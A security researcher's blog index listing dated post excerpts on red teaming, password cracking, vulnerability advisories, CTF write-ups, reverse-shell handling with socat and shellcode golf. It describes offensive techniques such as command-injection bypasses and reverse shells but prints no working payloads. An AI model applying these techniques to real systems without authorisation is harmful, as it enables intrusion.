Security on System Overlord

GPU Accelerated Password Cracking in the Cloud: Speed and Cost-Effectiveness

david@systemoverlord.com (David Tomaschik) — Sat, 05 Jun 2021 00:00:00 +0000

Note: Though this testing was done on Google Cloud and I work at Google, this work and blog post represent my personal work and do not represent the views of my employer.

As a red teamer and security researcher, I occasionally find the need to crack some hashed passwords. It used to be that John the Ripper was the go-to tool for the job. With the advent of GPGPU technologies like CUDA and OpenCL, hashcat quickly eclipsed John for pure speed. Unfortunately, graphics cards are a bit hard to come by in 2021. I decided to take a look at the options for running hashcat on Google Cloud.

Hacker Holiday Gift Guide - 2020 Edition

david@systemoverlord.com (David Tomaschik) — Thu, 26 Nov 2020 00:00:00 +0000

Welcome to the 2020 edition of my Hacker Holiday Gift Guide! This has been a trying year for all of us, but I sincerely hope you and your family are happy and healthy as this year comes to an end.

{:.no_toc}

TOC {:toc}

General Security

ProtonMail Subscription

ProtonMail is a great encrypted mail provider for those with an interest in privacy or cryptography. They offer gift cards for subscriptions to both ProtonMail and ProtonVPN, their VPN service.

Security 101: Beginning with Kali Linux

david@systemoverlord.com (David Tomaschik) — Fri, 03 Jul 2020 00:00:00 +0000

I’ve found a lot of people who are new to security, particularly those with an interest in penetration testing or red teaming, install Kali Linux™¹ as one of their first forays into the “hacking” world. In general, there’s absolutely nothing wrong with that. Unfortunately, I also see many who end up stuck on this journey: either stuck in the setup/installation phase, or just not knowing what to do once they get into Kali.

This isn’t going to be a tutorial about how to use the tools within Kali (though I hope to get to some of them eventually), but it will be a tour of the operating system’s basic options and functionality, and hopefully will help those new to the distribution get more oriented.

Hacker Culture Reading List

david@systemoverlord.com (David Tomaschik) — Fri, 26 Jun 2020 00:00:00 +0000

A friend recently asked me if I could recommend some reading about hacking and security culture. I gave a couple of quick answers, but it inspired me to write a blog post in case anyone else is looking for similar content. Unless otherwise noted, I’ve read all of these books/resources and can recommend them.

Private CA with X.509 Name Constraints

david@systemoverlord.com (David Tomaschik) — Sun, 14 Jun 2020 00:00:00 +0000

I wanted to run a small private Certificate Authority for some of my internal services. Since these aren’t reachable from the internet, and some of them are on network segments without internet connectivity, using a public ACME CA like Let’s Encrypt was inconvenient. On the other hand, if I run my own private CA and the keys get compromised, it could be used to MITM all my internet traffic. While that’s unlikely to happen, I decided to look for a better option.

It turns out that the idea of a “limited purpose” Certificate Authority is not new. RFC 5280 provides for something called “Name Constraints”, which allow an X.509 CA to have a scope limited to certain names, including the parent domains of the certificates issued by the CA. For example, a host constraint of .example.com allows the CA to issue certificates for anything under .example.com, but not any other host. For other hosts, clients will fail to validate the chain.

This hasn’t always been supported by TLS libraries and browsers, but all current browsers do support Name Constraints. Consequently, this is an approach to narrow the risks associated with a CA compromise for hosts other than those covered by the constraints in the CA certificate.

Book Review: Operator Handbook

david@systemoverlord.com (David Tomaschik) — Mon, 25 May 2020 00:00:00 +0000

When Netmux first released the Operator Handbook, I had to check it out. I had some initial impressions, but wanted to take some time to refine my thoughts on it before putting together a full review of the book. The book review will be a bit short, but that’s because this is a rather straightforward book.

{:.right}

I think the first things to know is that this book is strictly a reference. There’s nothing to read and learn things from in a cohesive way. It would be like reading a dictionary or a theasaurus – while you might learn things reading it, it’s not going to be in any meaningful way. There’s lots of things you can learn on a particular very narrow topic, but it is mostly organized to be “in the moment”, not as a “learning in advance” kind of thing.

Everyone in InfoSec Should Know How to Program

david@systemoverlord.com (David Tomaschik) — Fri, 22 May 2020 00:00:00 +0000

Okay, I’m not going to lie, the title was a bit of clickbait. I don’t believe that everyone in InfoSec really needs to know how to program, just almost everyone. Now, before my fellow practitioners jump on me, saying they can do their job just fine without programming, I’d appreciate you hearing me out.

So, how’d I get on this? Well, a thread on a private Slack discussing whether Red Team operators should know how to program, followed by people on Reddit asking if they should know how to program. I thought I’d share my views in a concrete (and longer) format here.

Announcing TIMEP: Test Interface for Multiple Embedded Protocols

david@systemoverlord.com (David Tomaschik) — Fri, 08 May 2020 00:00:00 +0000

Today I’m releasing a new open source hardware (OSHW) project – the Test Interface for Multiple Embedded Protocols (TIMEP). It’s based around the FTDI FT2232H chip and logic level shifters to provide breakouts, buffering, and level conversion for a number of common embedded hardware interfaces. At present, this includes:

SPI
I2C
JTAG
SWD
UART

This is a revision 4 board, made using OSHPark’s “After Dark” service – black substrate, clear solder mask, so you can see every trace on the board. (Strangely, copper looks very matte under the solder mask, resulting in more of a tan color than the shiny copper one might expect to see.)

So You Want a Red Team Exercise?

david@systemoverlord.com (David Tomaschik) — Fri, 17 Apr 2020 00:00:00 +0000

I originally wrote this for work, where we get a lot of requests to “Red Team” something. In a lot of these cases, a white box security review or other form of security testing is more appropriate. Because I’d heard through the grapevine that other Red Teams struggle with the same issues, I wanted to make it available publicly. Thanks to my management for their support and permission to take this public!

If you’d like to use or adapt this within your organization, feel free, but please give credit to the Google Red Team.

We frequently get requests to perform Red Team engagements on various products & services around our company. These requests often have misconceptions about the services our team provides. This document is intended to help those seeking a Red Team engagement have a better understanding of what we do, how we do it, and why we do it the way we do, and how to engage with us for optimal effectiveness.

CVE-2019-10071: Timing Attack in HMAC Verification in Apache Tapestry

david@systemoverlord.com (David Tomaschik) — Fri, 23 Aug 2019 00:00:00 +0000

Description

Apache Tapestry uses HMACs to verify the integrity of objects stored on the client side. This was added to address the Java deserialization vulnerability disclosed in CVE-2014-1972. In the fix for the previous vulnerability, the HMACs were compared by string comparison, which is known to be vulnerable to timing attacks.

Affected Versions

Apache Tapestry 5.3.6 through current releases.

Mitigation

No new release of Tapestry has occurred since the issue was reported. Affected organizations may want to consider locally applying commit d3928ad44714b949d247af2652c84dae3c27e1b1.

Hacker Summer Camp 2019: CTFs for Fun & Profit

david@systemoverlord.com (David Tomaschik) — Mon, 19 Aug 2019 00:00:00 +0000

Okay, I’m back from Summer Camp and have caught up (slightly) on life. I had the privilege of giving a talk at BSidesLV entitled “CTFs for Fun and Profit: Playing Games to Build Your Skills.” I wanted to post a quick link to my slides and talk about the IoT CTF I had the chance to play.

I played in the IoT Village CTF at DEF CON, which was interesting because it uses real-world devices with real-world vulnerabilities instead of the typical made-up challenges in a CTF. On the other hand, I’m a little disappointed that it seems pretty similar (maybe even the same) year-to-year, not providing much variety or new learning experiences if you’ve played before.

Hacker Summer Camp 2019: What I'm Bringing & Protecting Yourself

david@systemoverlord.com (David Tomaschik) — Sat, 27 Jul 2019 00:00:00 +0000

I’ve begun to think about what I’ll take to Hacker Summer Camp this year, and I thought I’d share some of it as part of my Hacker Summer Camp blog post series. I hope it will be useful to veterans, but particularly to first timers who might have no idea what to expect – as that’s how I felt my first time.

Since it’s gotten so close, I’ll also talk about what steps you should take to protect yourself.

So You Want to Red Team?

david@systemoverlord.com (David Tomaschik) — Tue, 26 Mar 2019 00:00:00 +0000

So there’s a lot of confusion out there about Penetration Testing and Red Teaming. I wanted to put together a list of resources for those familiar with infosec or penetration testing who want to get into red teaming or at least get a better understanding of the methodologies and techniques used by red teamers.

First, it’s important to note that Red Teaming is predominantly comprised of two things: alternative analysis and adversary simulation. Red teams do not attempt to find “all the vulnerabilities” and do not usually try to have a wide breadth of coverage. Instead, red teams seek to simulate an adversary with a particular objective, predominantly to act as a “sparring partner” for blue teams. Keep in mind, red teams are the only adversary that will debrief with the blue team so that blue team can figure out what they missed or could have done differently.

For more about the specific definition of Red Teaming, check out the presentation Red Teaming Probably Isn’t For You by fellow red teamer Toby Kohlenberg.

Certifications Aren't as Big a Deal as You Think

david@systemoverlord.com (David Tomaschik) — Fri, 15 Mar 2019 00:00:00 +0000

For some reason, security certifications get discussed a lot, particularly in forums catering to those newer to the industry. (See, for example, /r/asknetsec.) Now I’m not talking about business certifications (ISO, etc.) but personal certifications that allegedly demonstrate some kind of skill on behalf of the individual. There seems to be a lot of focus on certifications that you “need” or that will land you your dream security job.

I’m going to make the claim that you should stop worrying about certifications and instead spend your time learning things that will help you in the real world – or better yet, actually applying your skills in the real world. There are likely some people who will strongly disagree with me, and that’s good, but I want it to be a discussion that people think about, instead of just assuming certifications are some kind of magic wand.

Understanding Shellcode: The Reverse Shell

david@systemoverlord.com (David Tomaschik) — Tue, 30 Oct 2018 00:00:00 +0000

A recent conversation with a coworker inspired me to start putting together a series of blog posts to examine what it is that shellcode does. In the first installment, I’ll dissect the basic reverse shell.

First, a couple of reminders: shellcode is the machine code that is injected into the flow of a program as the result of an exploit. It generally must be position independent as you can’t usually control where it will be loaded in memory. A reverse shell initiates a TCP connection from the compromised host back to a host under the control of the attacker. It then launches a shell with which the attacker can interact.

Course Review: Software Defined Radio with HackRF

david@systemoverlord.com (David Tomaschik) — Fri, 14 Sep 2018 00:00:00 +0000

Over the past two days, I had the opportunity to attend Michael Ossman’s course “Software Defined Radio with HackRF” at Toorcon XX. This is a course I’ve wanted to take for several years, and I’m extremely happy that I finally had the chance. I wanted to write up a short review for others considering taking the course.

Course Material

The material in the course focuses predominantly on the basics of Software Defined Radio and Digital Signal Processing. This includes the math necessary to understand how the DSP handles the signal. The math is presented in a practical, rather than academic, way. It’s not a math class, but a review of the necessary basics, mostly of complex mathematics and a bit of trigonometry. (My high school teachers are now vindicated. I did use that math again.) You don’t need the math background coming in, but you do need to be prepared to think about math during the class. Extracting meaningful information from the ether is, it turns out, an exercise in mathematics.

"Entry-Level" Security Jobs and Experience

david@systemoverlord.com (David Tomaschik) — Mon, 27 Aug 2018 00:00:00 +0000

I’ve seen a lot of discussion of experience requirements and “entry-level” positions in the security industry lately. /r/netsecstudents and /r/asknetsec are full of threads discussing this topic, and I heard it being discussed at both BSidesLV and DEF CON this summer. The usual complaint is something along the lines of “all the positions want experience, so how am I supposed to get experience?” I’m going to take a stab at addressing this, and hope to at least provide some understanding.

Hacker Summer Camp 2018: Wrap-Up

david@systemoverlord.com (David Tomaschik) — Sat, 25 Aug 2018 00:00:00 +0000

I meant to write this post much closer to the end of Hacker Summer Camp, but to be honest, I’ve been completely swamped with getting back into the thick of things. However, I kept feeling like things were “unfinished”, so I thought I’d throw together at least a few thoughts from this year.

BSides Las Vegas

I can’t say much about BSides as a whole this year, as I spent the entire time Gold Teaming for Pros vs Joes CTF. (Gold Team is responsible for running the game infrastructure, scoreboard, etc.) It was a great experience to be on Gold Team, but I do miss having a team to support and educate. Overall, the CTF went fairly well, but there were a few bumps that I hope we can avoid next year.

I'm the One Who Doesn't Knock: Unlocking Doors From the Network

david@systemoverlord.com (David Tomaschik) — Fri, 10 Aug 2018 00:00:00 +0000

{:.right}

Today I’m giving a talk in the IoT Village at DEF CON 26. Though not a “main stage” talk, this is my first opportunity to speak at DEF CON. I’m really excited, especially with how much I enjoy IoT hacking. My talk was inspired by the research that lead to CVE-2017-17704, but it’s not meant to be a vendor-shaming session. It’s meant to be a discussion of the difficulty of getting physical access control systems that have IP communications features right. It’s meant to show that the designs we use to build a secure system when you have a classic user interface don’t work the same way in the IoT world.

(If you’re at DEF CON, come check it out at 4:45PM on Friday, August 10 in the IoT Village.)

Pros vs Joes CTF: The Evolution of Blue Teams

david@systemoverlord.com (David Tomaschik) — Tue, 19 Jun 2018 00:00:00 +0000

Pros v Joes CTF is a CTF that holds a special place in my heart. Over the years, I’ve moved from playing in the 1st CTF as a day-of pickup player (signing up at the conference) to a Blue Team Pro, to core CTF staff. It’s been an exciting journey, and Red Teaming there is about the only role I haven’t held. (Which is somewhat ironic given that my day job is a red team lead.) As Blue teams have just formed, and I’m not currently attached to any single team, I wanted to share my thoughts on the evolution of Blue teaming in this unique CTF. In many ways, this will resemble the Blue Team player’s guide I wrote about 3 years ago, but will be based on the evolution of the game and of the industry itself. That post remains relevant, and I encourage you to read it as well.

Hacker Summer Camp 2018: Prep Guide

david@systemoverlord.com (David Tomaschik) — Sat, 26 May 2018 00:00:00 +0000

For those unfamiliar with the term, Hacker Summer Camp is the combination of DEF CON, Black Hat USA, and BSides Las Vegas that takes place in the hot Las Vegas sun every summer, along with all the associated parties and side events. It’s the largest gathering of hackers, information security professionals and enthusiasts, and has been growing for 25 years. In this post, I’ll present my views on how to get the most out of your 2018 trip to the desert, along with tips & points from some of my friends.

How the Twitter and GitHub Password Logging Issues Could Happen

david@systemoverlord.com (David Tomaschik) — Thu, 03 May 2018 00:00:00 +0000

There have recently been a couple of highly-publicized (at least in the security community) issues with two tech giants logging passwords in plaintext. First, GitHub found they were logging plaintext passwords on password reset. Then, Twitter found they were logging all plaintext passwords. Let me begin by saying that I have no insider knowledge of either bug, and I have never worked at either Twitter or GitHub, but I enjoy randomly speculating on the internet, so I thought I would speculate on this. (Especially since the /r/netsec thread on the Twitter article is amazingly full of misconceptions.)

The IoT Hacker's Toolkit

david@systemoverlord.com (David Tomaschik) — Mon, 16 Apr 2018 12:00:00 +0000

Today, I’m giving a talk entitled “The IoT Hacker’s Toolkit” at BSides San Francisco. I thought I’d release a companion blog post to go along with the slide deck. I’ll also include a link to the video once it gets posted online.

TOC {:toc}

Introduction

From my talk synopysis:

IoT and embedded devices provide new challenges to security engineers hoping to understand and evaluate the attack surface these devices add. From new interfaces to uncommon operating systems and software, the devices require both skills and tools just a little outside the normal security assessment. I’ll show both the hardware and software tools, where they overlap and what capabilities each tool brings to the table. I’ll also talk about building the skillset and getting the hands-on experience with the tools necessary to perform embedded security assessments.

OpenSSH Two Factor Authentication (But Not Service Accounts)

david@systemoverlord.com (David Tomaschik) — Sat, 03 Mar 2018 00:00:00 +0000

Very often, people hear “SSH” and “two factor authentication” and assume you’re talking about an SSH keypair that’s got the private key protected with a passphrase. And while this is a reasonable approximation of a two factor system, it’s not actually two factor authentication because the server is not using two separate factors to authenticate the user. The only factor is the SSH keypair, and there’s no way for the server to know if that key was protected with a passphrase. However, OpenSSH has supported true two factor authentication for nearly 5 years now, so it’s quite possible to build even more robust security.

Preparing for Penetration Testing with Kali Linux

david@systemoverlord.com (David Tomaschik) — Wed, 14 Feb 2018 00:00:00 +0000

If you spend any time at all on Reddit or forums for information security students, you’ll find dozens of questions about preparing for the Penetration Testing with Kali Linux (PWK, aka OSCP) class from Offensive Security. Likewise, I’ve been asked by a number of people I know personally about moving into the security realm. I figured I’d put together some notes on how to prepare and the knowledge that I believe is necessary to succeed with the PWK class. Additionally, all of the skills listed here are skills I would expect even the most junior of penetration testers to possess.

Book Review: Red Team by Micah Zenko

david@systemoverlord.com (David Tomaschik) — Sat, 10 Feb 2018 00:00:00 +0000

Red Team: How to Succeed By Thinking Like the Enemy by Micah Zenko focuses on the role that red teaming plays in a variety of institutions, ranging from the Department of Defense to cybersecurity. It’s an excellent book that describes the thought process behind red teaming, when red teaming is a success and when it can be a failure, and the way a red team can best fit into an organization and provide value. If you’re looking for a book that’s highly technical or focused entirely on information security engineering, this book may disappoint. There’s only a single chapter covering the application of red teaming in the information security space (particularly “vulnerability probes” as Zenko refers to many of the tests), but that doesn’t make the rest of the content any less useful – or interesting – to the Red Team practitioner.

Security Is Not an Absolute

david@systemoverlord.com (David Tomaschik) — Mon, 05 Feb 2018 00:00:00 +0000

If there’s one thing I wish people from outside the security industry knew when dealing with information security, it’s that Security is not an absolute. Most of the time, it’s not even quantifiable. Even in the case of particular threat models, it’s often impossible to make statements about the security of a system with certainty.

Playing with the Gigastone Media Streamer Plus

david@systemoverlord.com (David Tomaschik) — Sun, 28 Jan 2018 00:00:00 +0000

TOC {:toc}

Background

A few months ago, I was shopping on woot.com and discovered the Gigastone Media Streamer Plus for about $25. I figured this might be something occassionally useful, or at least fun to look at for security vulnerabilities. When it arrived, I didn’t get around to it for quite a while, and then when I finally did, I was terribly disappointed in it as a security research target – it was just too easy.

Psychological Issues in the Security Industry

david@systemoverlord.com (David Tomaschik) — Fri, 26 Jan 2018 00:00:00 +0000

I’ve unfortunately had the experience of dealing with a number of psychological issues (either personally or through personal connections) during my tenure in the security fold. I hope to shed some light on them and encourage others to take them seriously.

If you are hoping this post will be some grand reveal of security engineers going psychotic and stabbing users who enter passwords into phishing pages with poor grammar and spelling, web site administrators who can’t be bothered to set up HTTPS, and ransomware authors, then I hate to disappoint you. If, on the other hand, you’re interested in observations of people who have experienced various psychological problems while in the security industry, then I’ll probably still disappoint, just but not as much.

socat as a handler for multiple reverse shells

david@systemoverlord.com (David Tomaschik) — Sat, 20 Jan 2018 00:00:00 +0000

I was looking for a new way to handle multiple incoming reverse shells. My shells needed to be encrypted and I preferred not to use Metasploit in this case. Because of the way I was deploying my implants, I wasn’t able to use separate incoming port numbers or other ways of directing the traffic to multiple listeners.

Obviously, it’s important to keep each reverse shell separated, so I couldn’t just have a listener redirecting all the connections to STDIN/STDOUT. I also didn’t want to wait for sessions serially – obviously I wanted to be connected to all of my implants simultaneously. (And allow them to disconnect/reconnect as needed due to loss of network connectivity.)

TP-Link Kasa App: SSL Verification Disabled (Fixed)

david@systemoverlord.com (David Tomaschik) — Tue, 16 Jan 2018 00:00:00 +0000

The TP-Link Kasa app is the Android app that TP-Link distributes to control their Smart Home line of products, including IoT light bulbs, outlet and a home hub. TP-Link describes the app as:

The Kasa app works with Android and iOS devices so you can control your home right from your smartphone or tablet. You can also use Kasa to pair TP-Link smart home products with any Amazon Echo, Dot, Tap and The Google Assistant for voice control, giving you the ability to control your home with voice commands.

Even With the Cloud, Client Security Still Matters

david@systemoverlord.com (David Tomaschik) — Wed, 27 Dec 2017 00:00:00 +0000

As usual, this post does not necessarily represent the views of my employer (past, present, or future).

It’s Friday afternoon and the marketing manager receives an email with the new printed material proofs for the trade show. Double clicking the PDF attachment, his PDF reader promptly crashes.

“Ugh, I’m gonna have to call IT again. I’ll do it Monday morning,” he thinks, and turns off his monitor before heading home for the weekend.

[CVE-2017-17704] Broken Cryptography in iStar Ultra & IP ACM by Software House

david@systemoverlord.com (David Tomaschik) — Mon, 18 Dec 2017 00:00:00 +0000

Introduction

Vulnerabilities were identified in the iStar Ultra & IP-ACM boards offered by Software House. This system is used to control physical access to resources based on RFID-based badge readers. Badge readers interface with the IP-ACM board, which uses TCP/IP to communicate with the iStar Ultra controller.

These were discovered during a black box assessment and therefore the vulnerability list should not be considered exhaustive; observations suggest that it is likely that further vulnerabilities exist. It is strongly recommended that Software House undertake a full whitebox security assessment of this application. Additionally, it is our suggestion that all communications be conducted over TLS. While alternatives are suggested below, cryptography is very difficult even for experts, and so using a well-understood cryptosystem like TLS is preferable to home-grown solutions. The version under test was indicated as: 6.5.2.20569. As of the time of disclosure, the issues remain unfixed.

2017 Hacker Holiday Gift Guide

david@systemoverlord.com (David Tomaschik) — Wed, 22 Nov 2017 00:00:00 +0000

I’ve been thinking about gifts for Hackers and Makers lately as the holiday season arrives. I decided I’d build a public list of some of my favorite things (and perhaps some things I’d like myself as well!) I’ll break it down into a few categories for different kinds of hackers (and different kinds of gifters as well). Prices are current as of writing, but not something I’ll be updating.

Hardware Hacking, Reversing and Instrumentation: A Review

david@systemoverlord.com (David Tomaschik) — Sat, 11 Nov 2017 00:00:00 +0000

I recently attended Dr. Dmitry Nedospasov’s 4-day “Hardware Hacking, Reversing and Instrumentation” training class as part of the HardwareSecurity.training event in San Francisco. I learned a lot, and it was incredibly fun class. If you understand the basics of hardware security and want to take it to the next level, this is the course for you.

The class predominantly focuses on the use of FPGAs for breaking security in hardware devices (embedded devices, microcontrollers, etc.). The advantage of FPGAs is that they can be used to implement arbitrary protocols and can operate with very high timing resolution. (e.g., single clock cycle, since it’s essentially synthesized hardware.)

Building a Home Lab for Offensive Security & Security Research

david@systemoverlord.com (David Tomaschik) — Tue, 24 Oct 2017 00:00:00 +0000

When I wrote my “getting started” post on offensive security, I promised I’d write about building a lab you can use to practice your skillset. It’s taken a little while for me to get to it, but I’m finally trying to deliver.

Much like the post on getting started, I’m not claiming to have all the answers. I’ll again be focusing on an environment that helps you build a focus in the areas I most work in – penetration testing, black box application security, and red teaming. (And if you’re wondering about the difference between a penetration test and red team, there will be a post for that too – I promise they’re very different.)

Hacker Summer Camp 2017: DEF CON

david@systemoverlord.com (David Tomaschik) — Sat, 05 Aug 2017 00:00:00 +0000

DEF CON, of course, is the main event of Hacker Summer Camp for me. It’s the largest gathering of hackers in the world, and it’s the only opportunity I get to see some of the people I know in the industry. It’s also the most hands-on of all of the conferences I’ve ever attended, and the people running the villages clearly know their stuff and are super passionate about their area. Nowhere do I see so much raw talent and excitement for the hacker spirit as at DEF CON.

Hacker Summer Camp 2017: Pros vs Joes CTF

david@systemoverlord.com (David Tomaschik) — Mon, 31 Jul 2017 00:00:00 +0000

I’ve returned from this year’s edition of Hacker Summer Camp, and while I’m completely and utterly exhausted, I wanted to get my thoughts about this year’s events out before I completely forget what happened.

The Pros vs Joes CTF was, yet again, a high quality event despite the usual bumps and twists. This was the largest PvJ ever, with more than 80 people involved between Blue Pros, Blue Joes, Red Cell, Grey Cell, and Gold Cell. Each blue team had 11 players between the two Pros and 9 Joes, making them slightly larger than in years past. (Though I believe that’s a temporary “feature” of this year’s game.)

Hacker Summer Camp 2017: XXV Badge

david@systemoverlord.com (David Tomaschik) — Mon, 31 Jul 2017 00:00:00 +0000

In my post the Many Badges of DEF CON 25 I may have not-so-subtly hinted that there was something I was working on. While none of the ones I listed were created in response to the announcement that DEF CON had been forced to switch to “Plan B” with their badges, mine more or less was. Ever since I saw the Queercon badge in 2015, I’d had the idea to create my own electronic badge, but the announcement spurred me on to action.

Hacker Summer Camp 2017 Planning Guide

david@systemoverlord.com (David Tomaschik) — Tue, 18 Jul 2017 00:00:00 +0000

My hacker summer camp planning posts are among the most-viewed on my blog, and I was recently reminded I hadn’t done one for 2017 yet, despite it being just around the corner!

Though many tips will be similar, feel free to check out the two posts from last year as well:

If you don’t know, Hacker Summer Camp is a nickname for 3 information security conferences in one week in Las Vegas every July/August. This includes Black Hat, BSides Las Vegas, and DEF CON.

Belden Garrettcom 6K/10K Switches: Auth Bypasses, Memory Corruption

david@systemoverlord.com (David Tomaschik) — Fri, 19 May 2017 00:00:00 +0000

Introduction

Vulnerabilities were identified in the Belden GarrettCom 6K and 10KT (Magnum) series network switches. These were discovered during a black box assessment and therefore the vulnerability list should not be considered exhaustive; observations suggest that it is likely that further vulnerabilities exist. It is strongly recommended that GarrettCom undertake a full whitebox security assessment of these switches.

The version under test was indicated as: 4.6.0. Belden Garrettcom released an advisory on 8 May 2017, indicating that issues were fixed in 4.7.7: https://www.belden.com/hubfs/support/security/bulletins/Belden-GarrettCom-MNS-6K-10K-Security-Bulletin-BSECV-2017-8.pdf?hsLang=en

This is a local copy of an advisory posted to the Full Disclosure mailing list.

Applied Physical Attacks and Hardware Pentesting

david@systemoverlord.com (David Tomaschik) — Sat, 13 May 2017 00:00:00 +0000

This week, I had the opportunity to take Joe Fitzpatrick’s class “Applied Physical Attacks and Hardware Pentesting”. This was a preview of the course he’s offering at Black Hat this summer, and so it was in a bit of an unpolished state, but I actually enjoyed the fact that it was that way. I’ve taken a class with Joe before, back when he and Stephen Ridley of Xipiter taught “Software Exploitation via Hardware Exploitation”, and I’ve watched a number of his talks at various conferences, so I had high expectations of the course, and he didn’t disappoint.

Security Issues in Alerton Webtalk (Auth Bypass, RCE)

david@systemoverlord.com (David Tomaschik) — Thu, 27 Apr 2017 00:00:00 +0000

Introduction

Vulnerabilities were identified in the Alerton Webtalk Software supplied by Alerton. This software is used for the management of building automation systems. These were discovered during a black box assessment and therefore the vulnerability list should not be considered exhaustive. Alerton has responded that Webtalk is EOL and past the end of its support period. Customers should move to newer products available from Alerton. Thanks to Alerton for prompt replies in communicating with us about these issues.

SANS Holiday Hack Challenge 2016

david@systemoverlord.com (David Tomaschik) — Thu, 05 Jan 2017 00:00:00 +0000

Table of Contents {:toc}

Introduction

This is my second time playing the SANS holiday hack challenge. It was a lot of fun, and probably took me about 8-10 hours over a period of 2-3 days, not including this writeup. Ironically, this writeup took me longer than actually completing the challenge – which brings me to a note about some of the examples in the writeup. Please ignore any dates or timelines you might see in screengrabs and other notes – I was so engrossed in playing that I did a terrible job of documenting as I went along, so a lot of these I went back and did a 2nd time (of course, knowing the solution made it a bit easier) so I could provide the quality of writeup I was hoping to.

Most importantly, a huge shout out to all the SANS Counter Hack guys – I can only imagine how much work goes into building an educational game like this and making the challenges realistic and engrossing. I’ve built wargames & similar apps for work, but never had to build them into a story – let across a story that spans multiple years. I tip my hat to their dedication and success!

New Tool: sshdog

david@systemoverlord.com (David Tomaschik) — Wed, 04 Jan 2017 00:00:00 +0000

I recently needed an encrypted, authenticated remote bind shell due to a situation where, believe it or not, the egress policies were stricter than ingress! Ideally I could forward traffic and copy files over the link.
I was looking for a good tool and casually asked my coworkers if they had any ideas when one said “sounds like SSH.”

Well, shit. That does sound like SSH and I didn’t even realize it. (Tunnel vision, and the value of bouncing ideas off of others.) But I had a few more requirements in total:

Security at the End of 2016

david@systemoverlord.com (David Tomaschik) — Sat, 31 Dec 2016 00:00:00 +0000

Well, 2016 is just about at an end, and what a year it has been. I’m not going to delve into politics, though that will arguably be how the history books will remember this year, but I want to take a look back at a few of the big security headlines of the year, and then make some completely wildass prognostications about information security in 2017.

Bad News of 2016

Yahoo! reported over 1 billion accounts were stolen by unknown attackers. Though the breaches occurred in 2013 and 2014, they weren’t publicly reported until the tail end of this year.

ObiHai ObiPhone: Multiple Vulnerabilties

david@systemoverlord.com (David Tomaschik) — Mon, 22 Aug 2016 00:00:00 +0000

Note that this a duplicate of the advisory sent to the full-disclosure mailing list.

Introduction

Multiple vulnerabilities were discovered in the web management interface of the ObiHai ObiPhone products. The Vulnerabilities were discovered during a black box security assessment and therefore the vulnerability list should not be considered exhaustive.

Affected Devices and Versions

ObiPhone 1032/1062 with firmware less than 5-0-0-3497.

Vulnerability Overview

Obi-1. Memory corruption leading to free() of an attacker-controlled address
Obi-2. Command injection in WiFi Config
Obi-3. Denial of Service due to buffer overflow
Obi-4. Buffer overflow in internal socket handler
Obi-5. Cross-site request forgery
Obi-6. Failure to implement RFC 2617 correctly
Obi-7. Invalid pointer dereference due to invalid header
Obi-8. Null pointer dereference due to malicious URL
Obi-9. Denial of service due to invalid content-length

(Slightly) Securing Wargame Servers

david@systemoverlord.com (David Tomaschik) — Sun, 21 Aug 2016 00:00:00 +0000

I was setting up some wargame boxes for a private group and wanted to reduce the risk of malfeasence/abuse from these boxes. One option, used by many public wargames, is locking down the firewall. While that’s a great start, I decided to go one step further and prevent directly logging in as the wargame users, requiring that the users of my private wargames have their own accounts.

Step 1: Setup the Private Accounts

This is pretty straightforward: create a group for these users that can SSH directly in, create their accounts, and setup their public keys.

Matir's Favorite Things

david@systemoverlord.com (David Tomaschik) — Sat, 20 Aug 2016 00:00:00 +0000

One of my friends was recently asking me about some of the tools I use, particularly for security assessments. While I can’t give out all of these things for free Oprah-style, I did want to take a moment to share some of my favorite security- and technology-related tools, services and resources.

Hardware

{:.left} My primary laptop is a Lenovo T450s. For me, it’s the perfect mix of weight and processing power – configured with enough RAM, the i5-5200U has no trouble running 2 or 3 VMs at the same time, and with an internal 3-cell battery plus a 6-cell battery pack, it will go all day without an outlet. (Though not necessarily under 100% CPU load.) Though Lenovo no longer sells this, having replaced it with the T460s, it’s still available on Amazon.

Chrome on Kali for root

david@systemoverlord.com (David Tomaschik) — Sun, 24 Jul 2016 00:00:00 +0000

For many of the tools on Kali Linux, it’s easiest to run them as root, so the defacto standard has more or less become to run as root when using Kali. Google Chrome, on the other hand, would not like to be run as root (because it makes sandboxing harder when your user is all-powerful) so there have been a number of tricks to get it to run. I’m going to describe my preferred setup here. (Mostly as documentation for myself.)

ASIS CTF 2016: 3magic

david@systemoverlord.com (David Tomaschik) — Sun, 08 May 2016 22:30:00 +0000

We’re directed to a web application that provides us with the ability to ping an arbitrary host. Like many such web interfaces, this one is vulnerable to command injection. We can provide flags like -v to get the version of ping being used, but inserting other characters, like |, ;, or $() result in a response of invalid character detected. Notably, so do spaces and tabs, significantly limiting the ability to run commands (we’ll see how to get around this shortly).

ASIS CTF 2016: Binary Cloud

david@systemoverlord.com (David Tomaschik) — Sun, 08 May 2016 22:30:00 +0000

Binary Cloud claims “Now you can upload any types of files, temporarily.” Let’s see what this means.

Rule one of web challenges: check robots.txt:

User-Agent: *
Disallow: /
Disallow: /debug.php
Disallow: /cache
Disallow: /uploads

So we have some interesting paths there. debug.php turns out to be a phpinfo() page, informing us it’s ‘PHP Version 7.0.4-7ubuntu2’. Interesting, pretty new version. I play around with the app briefly to see how it’s going to behave, and notice any file ending in .php is prohibited. No direct .php script upload for us.

ASIS CTF 2016: firtog

david@systemoverlord.com (David Tomaschik) — Sun, 08 May 2016 22:30:00 +0000

Firtog gives us a pcap file that you can quickly see features several TCP sessions containing the git server protocol. The binary protocol looks like this in the follow TCP stream mode:

Switching Wireshark to decode this as “Git” almost works, but there’s a trick. If we read the git pack protocol documentation, we’ll see there’s a special side-band mode here, where the length field is followed with a ‘1’, ‘2’, or ‘3’ byte indicating the type of data to follow. We only want the data from sideband ‘1’, which is the actual packfile data. So we’ll grab that data using Wireshark and write it to a file, fixing up the last byte with quick python work.

Even shorter x86-64 shellcode

david@systemoverlord.com (David Tomaschik) — Wed, 27 Apr 2016 00:00:00 +0000

So about two years ago, I put together the shortest x86-64 shellcode for execve("/bin/sh",...); that I could. At the time, it was 25 bytes, which I thought was pretty damn good. However, I’m a perfectionist and so I spent some time before work this morning playing shellcode golf. The rules of my shellcode golf are pretty simple:

The shellcode must produce the desired effect.
It doesn’t have to do things cleanly (i.e., segfaulting after is OK, as is using APIs in unusual ways, so long as it works)
It can assume the stack pointer is at a place where it will not segfault and it will not overwrite the shellcode itself.
No NULLs. While there might be other constraints, this one is too common to not have as a default.

So, spending a little bit of time on this, I came up with the following 22 byte shellcode:

Ham Fisted Legislators

david@systemoverlord.com (David Tomaschik) — Sun, 10 Apr 2016 00:00:00 +0000

